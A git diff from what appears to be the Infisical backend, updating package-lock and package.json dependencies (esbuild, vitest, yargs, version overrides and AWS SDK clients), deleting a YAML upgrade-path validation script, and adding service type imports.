+ "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/linux-loong64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/linux-loong64/-/linux-loong64-0.27.7.tgz", + "integrity": "sha512-a4POruNM2oWsD4WKvBSEKGIiWQF8fZOAsycHOt6JBpZ+JN2n2JH9WAv56SOyu9X5IqAjqSIPTaJkqN8F7XOQ5Q==", + "cpu": [ + "loong64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/linux-mips64el": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/linux-mips64el/-/linux-mips64el-0.27.7.tgz", + "integrity": "sha512-KabT5I6StirGfIz0FMgl1I+R1H73Gp0ofL9A3nG3i/cYFJzKHhouBV5VWK1CSgKvVaG4q1RNpCTR2LuTVB3fIw==", + "cpu": [ + "mips64el" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/linux-ppc64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ppc64/-/linux-ppc64-0.27.7.tgz", + "integrity": "sha512-gRsL4x6wsGHGRqhtI+ifpN/vpOFTQtnbsupUF5R5YTAg+y/lKelYR1hXbnBdzDjGbMYjVJLJTd2OFmMewAgwlQ==", + "cpu": [ + "ppc64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/linux-riscv64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/linux-riscv64/-/linux-riscv64-0.27.7.tgz", + "integrity": "sha512-hL25LbxO1QOngGzu2U5xeXtxXcW+/GvMN3ejANqXkxZ/opySAZMrc+9LY/WyjAan41unrR3YrmtTsUpwT66InQ==", + "cpu": [ + "riscv64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/linux-s390x": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/linux-s390x/-/linux-s390x-0.27.7.tgz", + "integrity": "sha512-2k8go8Ycu1Kb46vEelhu1vqEP+UeRVj2zY1pSuPdgvbd5ykAw82Lrro28vXUrRmzEsUV0NzCf54yARIK8r0fdw==", + "cpu": [ + "s390x" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/linux-x64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/linux-x64/-/linux-x64-0.27.7.tgz", + "integrity": "sha512-hzznmADPt+OmsYzw1EE33ccA+HPdIqiCRq7cQeL1Jlq2gb1+OyWBkMCrYGBJ+sxVzve2ZJEVeePbLM2iEIZSxA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/netbsd-arm64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/netbsd-arm64/-/netbsd-arm64-0.27.7.tgz", + "integrity": "sha512-b6pqtrQdigZBwZxAn1UpazEisvwaIDvdbMbmrly7cDTMFnw/+3lVxxCTGOrkPVnsYIosJJXAsILG9XcQS+Yu6w==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "netbsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/netbsd-x64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/netbsd-x64/-/netbsd-x64-0.27.7.tgz", + "integrity": "sha512-OfatkLojr6U+WN5EDYuoQhtM+1xco+/6FSzJJnuWiUw5eVcicbyK3dq5EeV/QHT1uy6GoDhGbFpprUiHUYggrw==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "netbsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/openbsd-arm64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/openbsd-arm64/-/openbsd-arm64-0.27.7.tgz", + "integrity": "sha512-AFuojMQTxAz75Fo8idVcqoQWEHIXFRbOc1TrVcFSgCZtQfSdc1RXgB3tjOn/krRHENUB4j00bfGjyl2mJrU37A==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "openbsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/openbsd-x64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/openbsd-x64/-/openbsd-x64-0.27.7.tgz", + "integrity": "sha512-+A1NJmfM8WNDv5CLVQYJ5PshuRm/4cI6WMZRg1by1GwPIQPCTs1GLEUHwiiQGT5zDdyLiRM/l1G0Pv54gvtKIg==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "openbsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/openharmony-arm64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/openharmony-arm64/-/openharmony-arm64-0.27.7.tgz", + "integrity": "sha512-+KrvYb/C8zA9CU/g0sR6w2RBw7IGc5J2BPnc3dYc5VJxHCSF1yNMxTV5LQ7GuKteQXZtspjFbiuW5/dOj7H4Yw==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "openharmony" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/sunos-x64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/sunos-x64/-/sunos-x64-0.27.7.tgz", + "integrity": "sha512-ikktIhFBzQNt/QDyOL580ti9+5mL/YZeUPKU2ivGtGjdTYoqz6jObj6nOMfhASpS4GU4Q/Clh1QtxWAvcYKamA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "sunos" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/win32-arm64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/win32-arm64/-/win32-arm64-0.27.7.tgz", + "integrity": "sha512-7yRhbHvPqSpRUV7Q20VuDwbjW5kIMwTHpptuUzV+AA46kiPze5Z7qgt6CLCK3pWFrHeNfDd1VKgyP4O+ng17CA==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/win32-ia32": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/win32-ia32/-/win32-ia32-0.27.7.tgz", + "integrity": "sha512-SmwKXe6VHIyZYbBLJrhOoCJRB/Z1tckzmgTLfFYOfpMAx63BJEaL9ExI8x7v0oAO3Zh6D/Oi1gVxEYr5oUCFhw==", + "cpu": [ + "ia32" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/win32-x64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/win32-x64/-/win32-x64-0.27.7.tgz", + "integrity": "sha512-56hiAJPhwQ1R4i+21FVF7V8kSD5zZTdHcVuRFMW0hn753vVfQN8xlx4uOPT4xoGH0Z/oVATuR82AiqSTDIpaHg==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/esbuild": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/esbuild/-/esbuild-0.27.7.tgz", + "integrity": "sha512-IxpibTjyVnmrIQo5aqNpCgoACA/dTKLTlhMHihVHhdkxKyPO1uBBthumT0rdHmcsk9uMonIWS0m4FljWzILh3w==", + "dev": true, + "hasInstallScript": true, + "license": "MIT", + "bin": { + "esbuild": "bin/esbuild" + }, + "engines": { + "node": ">=18" + }, + "optionalDependencies": { + "@esbuild/aix-ppc64": "0.27.7", + "@esbuild/android-arm": "0.27.7", + "@esbuild/android-arm64": "0.27.7", + "@esbuild/android-x64": "0.27.7", + "@esbuild/darwin-arm64": "0.27.7", + "@esbuild/darwin-x64": "0.27.7", + "@esbuild/freebsd-arm64": "0.27.7", + "@esbuild/freebsd-x64": "0.27.7", + "@esbuild/linux-arm": "0.27.7", + "@esbuild/linux-arm64": "0.27.7", + "@esbuild/linux-ia32": "0.27.7", + "@esbuild/linux-loong64": "0.27.7", + "@esbuild/linux-mips64el": "0.27.7", + "@esbuild/linux-ppc64": "0.27.7", + "@esbuild/linux-riscv64": "0.27.7", + "@esbuild/linux-s390x": "0.27.7", + "@esbuild/linux-x64": "0.27.7", + "@esbuild/netbsd-arm64": "0.27.7", + "@esbuild/netbsd-x64": "0.27.7", + "@esbuild/openbsd-arm64": "0.27.7", + "@esbuild/openbsd-x64": "0.27.7", + "@esbuild/openharmony-arm64": "0.27.7", + "@esbuild/sunos-x64": "0.27.7", + "@esbuild/win32-arm64": "0.27.7", + "@esbuild/win32-ia32": "0.27.7", + "@esbuild/win32-x64": "0.27.7" + } + }, + "node_modules/vite/node_modules/picomatch": { + "version": "4.0.4", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.4.tgz", + "integrity": "sha512-QP88BAKvMam/3NxH6vj2o21R6MjxZUAd6nlwAS/pnGvN9IVLocLHxGYIzFhg6fUQ+5th6P4dv4eW9jX3DSIj7A==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/jonschlinkert" + } + }, + "node_modules/vitest": { + "version": "3.2.4", + "resolved": "https://registry.npmjs.org/vitest/-/vitest-3.2.4.tgz", + "integrity": "sha512-LUCP5ev3GURDysTWiP47wRRUpLKMOfPh+yKTx3kVIEiu5KOMeqzpnYNsKyOoVrULivR8tLcks4+lga33Whn90A==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/chai": "^5.2.2", + "@vitest/expect": "3.2.4", + "@vitest/mocker": "3.2.4", + "@vitest/pretty-format": "^3.2.4", + "@vitest/runner": "3.2.4", + "@vitest/snapshot": "3.2.4", + "@vitest/spy": "3.2.4", + "@vitest/utils": "3.2.4", + "chai": "^5.2.0", + "debug": "^4.4.1", + "expect-type": "^1.2.1", + "magic-string": "^0.30.17", + "pathe": "^2.0.3", + "picomatch": "^4.0.2", + "std-env": "^3.9.0", + "tinybench": "^2.9.0", + "tinyexec": "^0.3.2", + "tinyglobby": "^0.2.14", + "tinypool": "^1.1.1", + "tinyrainbow": "^2.0.0", + "vite": "^5.0.0 || ^6.0.0 || ^7.0.0-0", + "vite-node": "3.2.4", + "why-is-node-running": "^2.3.0" + }, + "bin": { + "vitest": "vitest.mjs" + }, + "engines": { + "node": "^18.0.0 || ^20.0.0 || >=22.0.0" + }, + "funding": { + "url": "https://opencollective.com/vitest" + }, + "peerDependencies": { + "@edge-runtime/vm": "*", + "@types/debug": "^4.1.12", + "@types/node": "^18.0.0 || ^20.0.0 || >=22.0.0", + "@vitest/browser": "3.2.4", + "@vitest/ui": "3.2.4", + "happy-dom": "*", + "jsdom": "*" + }, + "peerDependenciesMeta": { + "@edge-runtime/vm": { "optional": true }, - "sugarss": { + "@types/debug": { "optional": true }, - "terser": { + "@types/node": { "optional": true }, - "tsx": { + "@vitest/browser": { "optional": true }, - "yaml": { + "@vitest/ui": { + "optional": true + }, + "happy-dom": { + "optional": true + }, + "jsdom": { + "optional": true + } + } + }, + "node_modules/vitest/node_modules/@vitest/mocker": { + "version": "3.2.4", + "resolved": "https://registry.npmjs.org/@vitest/mocker/-/mocker-3.2.4.tgz", + "integrity": "sha512-46ryTE9RZO/rfDd7pEqFl7etuyzekzEhUbTW3BvmeO/BcCMEgq59BKhek3dXDWgAj4oMK6OZi+vRr1wPW6qjEQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@vitest/spy": "3.2.4", + "estree-walker": "^3.0.3", + "magic-string": "^0.30.17" + }, + "funding": { + "url": "https://opencollective.com/vitest" + }, + "peerDependencies": { + "msw": "^2.4.9", + "vite": "^5.0.0 || ^6.0.0 || ^7.0.0-0" + }, + "peerDependenciesMeta": { + "msw": { + "optional": true + }, + "vite": { + "optional": true + } + } + }, + "node_modules/vitest/node_modules/debug": { + "version": "4.4.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.3.tgz", + "integrity": "sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==", + "dev": true, + "license": "MIT", + "dependencies": { + "ms": "^2.1.3" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { "optional": true } } }, + "node_modules/vitest/node_modules/picomatch": { + "version": "4.0.4", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.4.tgz", + "integrity": "sha512-QP88BAKvMam/3NxH6vj2o21R6MjxZUAd6nlwAS/pnGvN9IVLocLHxGYIzFhg6fUQ+5th6P4dv4eW9jX3DSIj7A==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/jonschlinkert" + } + }, "node_modules/w3c-xmlserializer": { "version": "5.0.0", "resolved": "https://registry.npmjs.org/w3c-xmlserializer/-/w3c-xmlserializer-5.0.0.tgz", @@ -27418,6 +27492,15 @@ "node": ">=16" } }, + "node_modules/xml-crypto/node_modules/@xmldom/xmldom": { + "version": "0.8.12", + "resolved": "https://registry.npmjs.org/@xmldom/xmldom/-/xmldom-0.8.12.tgz", + "integrity": "sha512-9k/gHF6n/pAi/9tqr3m3aqkuiNosYTurLLUtc7xQ9sxB/wm7WPygCv8GYa6mS0fLJEHhqMC1ATYhz++U/lRHqg==", + "license": "MIT", + "engines": { + "node": ">=10.0.0" + } + }, "node_modules/xml-crypto/node_modules/xpath": { "version": "0.0.33", "resolved": "https://registry.npmjs.org/xpath/-/xpath-0.0.33.tgz", @@ -27438,6 +27521,15 @@ "xpath": "0.0.32" } }, + "node_modules/xml-encryption/node_modules/@xmldom/xmldom": { + "version": "0.8.12", + "resolved": "https://registry.npmjs.org/@xmldom/xmldom/-/xmldom-0.8.12.tgz", + "integrity": "sha512-9k/gHF6n/pAi/9tqr3m3aqkuiNosYTurLLUtc7xQ9sxB/wm7WPygCv8GYa6mS0fLJEHhqMC1ATYhz++U/lRHqg==", + "license": "MIT", + "engines": { + "node": ">=10.0.0" + } + }, "node_modules/xml-encryption/node_modules/xpath": { "version": "0.0.32", "resolved": "https://registry.npmjs.org/xpath/-/xpath-0.0.32.tgz", @@ -27510,6 +27602,7 @@ "version": "5.0.8", "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", + "license": "ISC", "engines": { "node": ">=10" } @@ -27534,6 +27627,74 @@ "url": "https://github.com/sponsors/eemeli" } }, + "node_modules/yargs": { + "version": "17.7.2", + "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", + "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", + "license": "MIT", + "dependencies": { + "cliui": "^8.0.1", + "escalade": "^3.1.1", + "get-caller-file": "^2.0.5", + "require-directory": "^2.1.1", + "string-width": "^4.2.3", + "y18n": "^5.0.5", + "yargs-parser": "^21.1.1" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/yargs-parser": { + "version": "21.1.1", + "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", + "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", + "license": "ISC", + "engines": { + "node": ">=12" + } + }, + "node_modules/yargs/node_modules/ansi-regex": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", + "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", + "license": "MIT", + "engines": { + "node": ">=8" + } + }, + "node_modules/yargs/node_modules/emoji-regex": { + "version": "8.0.0", + "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", + "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", + "license": "MIT" + }, + "node_modules/yargs/node_modules/string-width": { + "version": "4.2.3", + "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", + "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", + "license": "MIT", + "dependencies": { + "emoji-regex": "^8.0.0", + "is-fullwidth-code-point": "^3.0.0", + "strip-ansi": "^6.0.1" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/yargs/node_modules/strip-ansi": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", + "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", + "license": "MIT", + "dependencies": { + "ansi-regex": "^5.0.1" + }, + "engines": { + "node": ">=8" + } + }, "node_modules/yn": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/yn/-/yn-3.1.1.tgz", diff --git a/backend/package.json b/backend/package.json index 505dc173e81..2ffc2095d7a 100644 --- a/backend/package.json +++ b/backend/package.json @@ -62,7 +62,7 @@ "cipher-base": "1.0.5", "sha.js": "2.4.12", "jws": "^4.0.1", - "qs": "^6.14.1", + "qs": "^6.14.2", "glob": "^10.5.0", "cross-spawn": "^7.0.6", "validator": "^13.15.22", @@ -71,7 +71,15 @@ }, "ts-node": { "diff": "^4.0.4" - } + }, + "hono": "^4.12.12", + "@hono/node-server": "^1.19.13", + "vite": "^7.3.2", + "@xmldom/xmldom": "^0.8.12", + "lodash": "^4.18.0", + "tar": "^7.5.11", + "flatted": "^3.4.2", + "@octokit/request-error": "^5.1.1" }, "devDependencies": { "@babel/cli": "^7.18.10", @@ -83,8 +91,6 @@ "@smithy/types": "^4.3.1", "@types/bcrypt": "^5.0.2", "@types/dns-packet": "^5.6.5", - "@types/jmespath": "^0.15.2", - "@types/js-yaml": "^4.0.9", "@types/jsonwebtoken": "^9.0.5", "@types/jsrp": "^0.2.6", "@types/libsodium-wrappers": "^0.7.13", @@ -117,11 +123,9 @@ "eslint-plugin-simple-import-sort": "^10.0.0", "nock": "^14.0.10", "nodemon": "^3.0.2", - "ora": "^7.0.1", "pino-pretty": "^10.2.3", "prompt-sync": "^4.2.0", "react-email": "^5.0.6", - "rimraf": "^5.0.5", "ts-node": "^10.9.2", "tsc-alias": "^1.8.8", "tsconfig-paths": "^4.2.0", @@ -132,12 +136,15 @@ }, "dependencies": { "@ai-sdk/anthropic": "^3.0.68", + "@aws-sdk/client-acm": "^3.1030.0", "@aws-sdk/client-acm-pca": "^3.992.0", + "@aws-sdk/client-elastic-load-balancing-v2": "^3.1015.0", "@aws-sdk/client-elasticache": "^3.637.0", "@aws-sdk/client-iam": "^3.525.0", "@aws-sdk/client-kms": "^3.609.0", "@aws-sdk/client-route-53": "^3.810.0", "@aws-sdk/client-secrets-manager": "^3.504.0", + "@aws-sdk/client-ssm": "^3.1015.0", "@aws-sdk/client-sts": "^3.600.0", "@casl/ability": "^6.5.0", "@clickhouse/client": "^1.17.0", @@ -158,7 +165,7 @@ "@fastify/swagger-ui": "^3.1.0", "@fastify/websocket": "^10.0.1", "@gitbeaker/rest": "^42.5.0", - "@google-cloud/kms": "^4.5.0", + "@google-cloud/kms": "^5.4.0", "@infisical/ldapjs": "3.0.11", "@infisical/pg-view-generator": "^1.1.0", "@infisical/quic": "^1.0.8", @@ -168,7 +175,6 @@ "@octokit/core": "^5.2.1", "@octokit/plugin-paginate-graphql": "^4.0.1", "@octokit/plugin-retry": "^5.0.5", - "@octokit/request": "8.4.1", "@octokit/rest": "^20.0.2", "@octokit/webhooks-types": "^7.3.1", "@octopusdeploy/api-client": "^3.4.1", @@ -180,12 +186,9 @@ "@opentelemetry/resources": "^1.28.0", "@opentelemetry/sdk-metrics": "^1.28.0", "@opentelemetry/semantic-conventions": "^1.27.0", - "@peculiar/asn1-cms": "^2.6.1", - "@peculiar/asn1-pkcs9": "^2.6.1", "@peculiar/asn1-schema": "^2.3.8", "@peculiar/x509": "^1.12.1", "@react-email/components": "^1.0.1", - "@serdnam/pino-cloudwatch-transport": "^1.0.4", "@simplewebauthn/server": "^13.2.2", "@sindresorhus/slugify": "1.1.0", "@slack/oauth": "^3.0.2", @@ -194,11 +197,9 @@ "@ucast/mongo2js": "^1.3.4", "acme-client": "^5.4.0", "ai": "^6.0.154", - "ajv": "^8.12.0", "argon2": "^0.31.2", "asn1js": "^3.0.6", - "aws-sdk": "^2.1553.0", - "axios": "^1.12.0", + "axios": "^1.15.0", "axios-ntlm": "^1.4.4", "axios-retry": "^4.0.0", "bcrypt": "^5.1.1", @@ -218,9 +219,7 @@ "hdb": "^0.19.10", "ioredis": "^5.3.2", "isomorphic-dompurify": "^2.22.0", - "jmespath": "^0.16.0", "jose": "^6.1.0", - "js-yaml": "^4.1.0", "jsonwebtoken": "^9.0.2", "jsrp": "^0.2.4", "jwks-rsa": "^3.1.0", @@ -236,7 +235,7 @@ "nanoid": "^3.3.8", "netmask": "^2.0.2", "node-forge": "^1.3.2", - "nodemailer": "^7.0.12", + "nodemailer": "^8.0.5", "oci-common": "^2.108.0", "oci-identity": "^2.108.0", "oci-keymanagement": "^2.108.0", diff --git a/backend/scripts/validate-upgrade-path-file.ts b/backend/scripts/validate-upgrade-path-file.ts deleted file mode 100644 index 566300cdebf..00000000000 --- a/backend/scripts/validate-upgrade-path-file.ts +++ /dev/null @@ -1,107 +0,0 @@ -/* eslint-disable no-console */ -import { readFile } from "fs/promises"; -import * as yaml from "js-yaml"; -import * as path from "path"; -import { z } from "zod"; - -import { upgradePathConfigSchema } from "../src/services/upgrade-path/upgrade-path-schemas"; - -async function validateUpgradePathConfig(): Promise { - try { - const yamlPath = path.join(__dirname, "..", "upgrade-path.yaml"); - const resolvedPath = path.resolve(yamlPath); - const expectedBaseDir = path.resolve(__dirname, ".."); - - if (!resolvedPath.startsWith(expectedBaseDir)) { - throw new Error("Invalid configuration file path"); - } - - try { - await readFile(yamlPath, "utf8"); - } catch (error) { - if (error instanceof Error && "code" in error && error.code === "ENOENT") { - console.log("Warning: No upgrade-path.yaml file found"); - return; - } - throw error; - } - - const yamlContent = await readFile(yamlPath, "utf8"); - - if (yamlContent.length > 1024 * 1024) { - throw new Error("Config file too large (>1MB)"); - } - - let config: unknown; - try { - config = yaml.load(yamlContent, { - schema: yaml.FAILSAFE_SCHEMA, - filename: yamlPath, - onWarning: (warning) => { - console.log(`YAML Warning: ${warning.message}`); - } - }); - } catch (yamlError) { - if (yamlError instanceof yaml.YAMLException) { - throw new Error( - `YAML parsing failed: ${yamlError.message} at line ${yamlError.mark?.line}, column ${yamlError.mark?.column}` - ); - } - throw new Error(`YAML parsing failed: ${yamlError instanceof Error ? yamlError.message : "Unknown YAML error"}`); - } - - if (!config) { - console.log("Warning: Empty configuration file"); - return; - } - - if (typeof config !== "object" || config === null) { - throw new Error("Configuration must be a valid YAML object"); - } - - const result = upgradePathConfigSchema.safeParse(config); - - if (!result.success) { - console.log("Validation failed with the following errors:"); - result.error.issues.forEach((issue: z.ZodIssue) => { - const issuePath = issue.path.length > 0 ? `[${issue.path.join(".")}]` : ""; - console.log(` - ${issuePath}: ${issue.message}`); - }); - throw new Error("Schema validation failed"); - } - - const validatedConfig = result.data; - const versions = validatedConfig?.versions || {}; - const versionCount = Object.keys(versions).length; - - if (versionCount === 0) { - console.log("Warning: No versions found in the configuration"); - } else { - console.log(`Validated ${versionCount} version configuration(s)`); - - const commonPatterns = [ - /^v?\d+\.\d+\.\d+$/, - /^v?\d+\.\d+\.\d+\.\d+$/, - /^infisical\/v?\d+\.\d+\.\d+$/, - /^infisical\/v?\d+\.\d+\.\d+-\w+$/ - ]; - - for (const versionKey of Object.keys(versions)) { - const isCommonPattern = commonPatterns.some((pattern) => pattern.test(versionKey)); - if (!isCommonPattern) { - console.log(`Warning: Version key '${versionKey}' doesn't match common patterns. This may be intentional.`); - } - } - } - - console.log("upgrade-path.yaml format is valid"); - } catch (error) { - console.error(`Validation failed: ${error instanceof Error ? error.message : "Unknown error"}`); - process.exit(1); - } -} - -validateUpgradePathConfig().catch((error) => { - console.error("Unexpected error:", error); - process.exit(1); -}); diff --git a/backend/src/@types/fastify.d.ts b/backend/src/@types/fastify.d.ts index 3a85c1f93f1..81a5972858f 100644 --- a/backend/src/@types/fastify.d.ts +++ b/backend/src/@types/fastify.d.ts @@ -19,10 +19,12 @@ import { TEmailDomainServiceFactory } from "@app/ee/services/email-domain/email- import { TEventBusService as TInternalEventBusService } from "@app/ee/services/event-bus"; import { TExternalKmsServiceFactory } from "@app/ee/services/external-kms/external-kms-service"; import { TGatewayServiceFactory } from "@app/ee/services/gateway/gateway-service"; +import { TGatewayPoolServiceFactory } from "@app/ee/services/gateway-pool/gateway-pool-service"; import { TGatewayV2ServiceFactory } from "@app/ee/services/gateway-v2/gateway-v2-service"; import { TGithubOrgSyncServiceFactory } from "@app/ee/services/github-org-sync/github-org-sync-service"; import { TGroupServiceFactory } from "@app/ee/services/group/group-service"; import { TIdentityAuthTemplateServiceFactory } from "@app/ee/services/identity-auth-template"; +import { TInsightsServiceFactory } from "@app/ee/services/insights/insights-service"; import { TKmipClientDALFactory } from "@app/ee/services/kmip/kmip-client-dal"; import { TKmipOperationServiceFactory } from "@app/ee/services/kmip/kmip-operation-service"; import { TKmipServiceFactory } from "@app/ee/services/kmip/kmip-service"; @@ -32,6 +34,7 @@ import { TOidcConfigServiceFactory } from "@app/ee/services/oidc/oidc-config-ser import { TPamAccountServiceFactory } from "@app/ee/services/pam-account/pam-account-service"; import { TPamAccountPolicyServiceFactory } from "@app/ee/services/pam-account-policy/pam-account-policy-service"; import { TPamDiscoverySourceServiceFactory } from "@app/ee/services/pam-discovery/pam-discovery-source-service"; +import { TPamDomainServiceFactory } from "@app/ee/services/pam-domain/pam-domain-service"; import { TPamFolderServiceFactory } from "@app/ee/services/pam-folder/pam-folder-service"; import { TPamResourceRotationRulesServiceFactory } from "@app/ee/services/pam-resource/pam-resource-rotation-rules-service"; import { TPamResourceServiceFactory } from "@app/ee/services/pam-resource/pam-resource-service"; @@ -52,7 +55,6 @@ import { TSamlConfigServiceFactory } from "@app/ee/services/saml-config/saml-con import { TScimServiceFactory } from "@app/ee/services/scim/scim-types"; import { TSecretApprovalPolicyServiceFactory } from "@app/ee/services/secret-approval-policy/secret-approval-policy-service"; import { TSecretApprovalRequestServiceFactory } from "@app/ee/services/secret-approval-request/secret-approval-request-service"; -import { TSecretRotationServiceFactory } from "@app/ee/services/secret-rotation/secret-rotation-service"; import { TSecretRotationV2ServiceFactory } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-service"; import { TSecretScanningServiceFactory } from "@app/ee/services/secret-scanning/secret-scanning-service"; import { TSecretScanningV2ServiceFactory } from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-service"; @@ -67,14 +69,13 @@ import { RequestMemoizer } from "@app/lib/request-context/request-memoizer"; import { TAuthMode } from "@app/server/plugins/auth/inject-identity"; import { TAccountRecoveryServiceFactory } from "@app/services/account-recovery/account-recovery-service"; import { TAdditionalPrivilegeServiceFactory } from "@app/services/additional-privilege/additional-privilege-service"; -import { TApiKeyServiceFactory } from "@app/services/api-key/api-key-service"; import { TAppConnectionServiceFactory } from "@app/services/app-connection/app-connection-service"; import { TAppConnectionCredentialRotationServiceFactory } from "@app/services/app-connection/credential-rotation"; import { TApprovalPolicyServiceFactory } from "@app/services/approval-policy/approval-policy-service"; import { TAuthLoginFactory } from "@app/services/auth/auth-login-service"; import { TAuthPasswordFactory } from "@app/services/auth/auth-password-service"; import { TAuthSignupFactory } from "@app/services/auth/auth-signup-service"; -import { ActorAuthMethod, ActorType, TProviderAuthCallback } from "@app/services/auth/auth-type"; +import { ActorAuthMethod, ActorType, MfaMethod, TProviderAuthCallback } from "@app/services/auth/auth-type"; import { TAuthTokenServiceFactory } from "@app/services/auth-token/auth-token-service"; import { TCertificateServiceFactory } from "@app/services/certificate/certificate-service"; import { TCaAutoRenewalQueueFactory } from "@app/services/certificate-authority/ca-auto-renewal-queue"; @@ -83,6 +84,7 @@ import { TCertificateAuthorityServiceFactory } from "@app/services/certificate-a import { TInternalCertificateAuthorityServiceFactory } from "@app/services/certificate-authority/internal/internal-certificate-authority-service"; import { 